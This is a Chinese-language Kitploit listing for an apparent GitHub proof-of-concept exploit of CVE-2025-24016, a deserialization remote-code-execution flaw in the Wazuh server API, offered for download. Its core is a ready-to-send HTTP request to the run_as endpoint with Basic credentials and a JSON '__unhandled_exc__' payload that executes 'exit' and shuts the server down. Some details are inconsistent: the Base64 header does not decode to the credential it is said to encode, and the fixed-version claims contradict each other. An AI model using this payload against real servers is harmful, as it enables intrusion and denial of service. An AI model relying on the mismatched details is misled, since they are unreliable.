Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-24016 — CVE-2025-24016: Wazuh 服务器中的 RCE!远程代码执行 | Kitploit
工具/GitHubGitHub/glostarrx1/cve-2025-24016
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队Payload 开发
GitHubglostarrx1/cve-2025-24016

CVE-2025-24016

CVE-2025-24016: Wazuh 服务器中的 RCE!远程代码执行

查看仓库
1621年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
网站
分享

Wazuh 远程代码执行(RCE)- PoC

漏洞概述

本仓库演示了 Wazuh 服务器中由 wazuh-manager 包的不安全反序列化引入的远程代码执行(RCE)漏洞。该漏洞允许具有 API 访问权限的远程攻击者(受感染的仪表盘、集群中的 Wazuh 服务器,或某些配置下受感染的代理)在服务器上执行任意代码。

受影响版本

  • wazuh-manager 版本 >= 4.4.0
  • 已在版本 >= 4.9.1 中修复

描述

该漏洞出现在 Wazuh API 中,DistributedAPI 中的参数会被序列化为 JSON,并在 framework/wazuh/core/cluster/common.py 文件中使用 as_wazuh_object 进行反序列化。攻击者可以通过向 DAPI 请求注入未经净化的字典来利用此漏洞,这可能导致任意 Python 代码被执行。

攻击者可以通过 run_as 端点触发 RCE,该端点允许攻击者控制 auth_context 参数。通过构造恶意请求,可以在主服务器上执行任意代码。

概念验证

要使用服务器 API 触发此漏洞,请按照以下步骤操作。

PoC Burp Suite 请求

  1. 用于触发漏洞的 Burp Suite 请求:
root@kitploit:~
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg==  # Base64-encoded "wazuh-wui:MyS3cr37P450r.*-"
Content-Type: application/json
Content-Length: 83

{
  "__unhandled_exc__": {
    "__class__": "exit",
    "__args__": []
  }
}

解决方案图片

  1. 请求说明:
  • Authorization 标头:这是 base64 编码的授权信息(wazuh-wui:MyS3cr37P450r.*-)。
  • Payload(载荷):恶意载荷包含未经净化的异常 __unhandled_exc__,它会触发任意 Python 代码(此处为 exit)的执行。

影响

  • 远程代码执行(RCE):此漏洞允许攻击者在 Wazuh 服务器上执行任意代码,影响版本 >= 4.4.0 直至 4.9.0(尚未修复)。
  • 潜在的拒绝服务:在此 PoC 中,exit 函数被触发,导致 Wazuh 服务器关闭。

缓解措施

为保护您的系统,请升级到已修复此问题的 Wazuh 版本 >= 4.9.1。

下载工具